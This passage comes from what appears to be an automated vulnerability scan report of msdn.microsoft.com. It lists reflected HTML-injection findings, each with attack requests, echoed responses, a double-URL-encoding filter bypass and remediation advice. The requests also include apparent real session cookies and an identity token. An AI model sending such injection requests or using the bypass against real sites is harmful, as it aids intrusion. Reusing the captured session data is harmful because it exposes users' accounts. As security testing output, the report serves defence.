MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11e1089"><a>1aa87e60d4f" />
...[SNIP]...

2.72. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80778%2522%253e%253ca%253e591d660c3c3 was submitted in the REST URL parameter 1. This input was echoed as 80778"><a>591d660c3c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us80778%2522%253e%253ca%253e591d660c3c3/library/dd582939(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us80778"><a>591d660c3c3/library/dd582939(office.11)" />
...[SNIP]...

2.73. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a19f7%2522%253e%253ca%253e3cb7c16355f was submitted in the REST URL parameter 2. This input was echoed as a19f7"><a>3cb7c16355f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya19f7%2522%253e%253ca%253e3cb7c16355f/dd582939(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya19f7"><a>3cb7c16355f/dd582939(office.11)" />
...[SNIP]...

2.74. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecd%2522%253e%253ca%253eadfdc378508 was submitted in the REST URL parameter 3. This input was echoed as ebecd"><a>adfdc378508 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582939(office.11).aspxebecd%2522%253e%253ca%253eadfdc378508 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9231
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11).aspxebecd"><a>adfdc378508" />
...[SNIP]...

2.75. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67864%2522%253e%253ca%253ecad7ddbae4c was submitted in the REST URL parameter 1. This input was echoed as 67864"><a>cad7ddbae4c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us67864%2522%253e%253ca%253ecad7ddbae4c/library/dd582940(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; 
ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9220
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us67864"><a>cad7ddbae4c/library/dd582940(office.11" />
...[SNIP]...

2.76. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6921d%2522%253e%253ca%253e979c28d57ca was submitted in the REST URL parameter 2. This input was echoed as 6921d"><a>979c28d57ca in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library6921d%2522%253e%253ca%253e979c28d57ca/dd582940(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6921d"><a>979c28d57ca/dd582940(office.11" />
...[SNIP]...

2.77. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582940(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a8e%2522%253e%253ca%253edc8afda3d17 was submitted in the REST URL parameter 3. This input was echoed as 54a8e"><a>dc8afda3d17 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582940(office.1154a8e%2522%253e%253ca%253edc8afda3d17 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.1154a8e"><a>dc8afda3d17" />
...[SNIP]...

2.78. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 1]

Summary

Severity:   High
